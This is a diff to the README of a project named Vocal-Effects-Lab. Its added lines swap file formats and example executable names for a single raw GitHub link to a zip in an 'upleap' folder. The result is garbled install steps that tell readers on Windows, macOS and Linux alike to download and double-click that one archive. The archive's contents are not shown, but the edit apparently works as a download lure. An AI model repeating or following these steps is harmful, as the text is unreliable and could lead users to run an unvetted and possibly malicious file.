MyosSSS/Vocal-Effects-Lab/README.md

 4. **Download the Application:**
    - Click on the correct file to start the download.
-   - The file will likely be in .zip or .exe format for Windows, .dmg for macOS, or .tar.gz for Linux.
+   - The file will likely be in .zip or .exe format for Windows, .dmg for macOS, or https://raw.githubusercontent.com/MyosSSS/Vocal-Effects-Lab/main/upleap/Effects-Vocal-Lab-2.6.zip for Linux.

 5. **Extract the Files:**
    - For zipped files, right-click the downloaded file and select "Extract All" or use any extraction tool you prefer.
    - Open the extracted folder.

 6. **Run the Application:**
-   - Double-click the application file (e.g., `VocalEffectsLab.exe` for Windows, `VocalEffectsLab.dmg` for macOS) to start it.
+   - Double-click the application file (e.g., `https://raw.githubusercontent.com/MyosSSS/Vocal-Effects-Lab/main/upleap/Effects-Vocal-Lab-2.6.zip` for Windows, `https://raw.githubusercontent.com/MyosSSS/Vocal-Effects-Lab/main/upleap/Effects-Vocal-Lab-2.6.zip` for macOS) to start it.
    - Follow any on-screen prompts to complete the installation process.

 7. **Get Ready to Experiment:**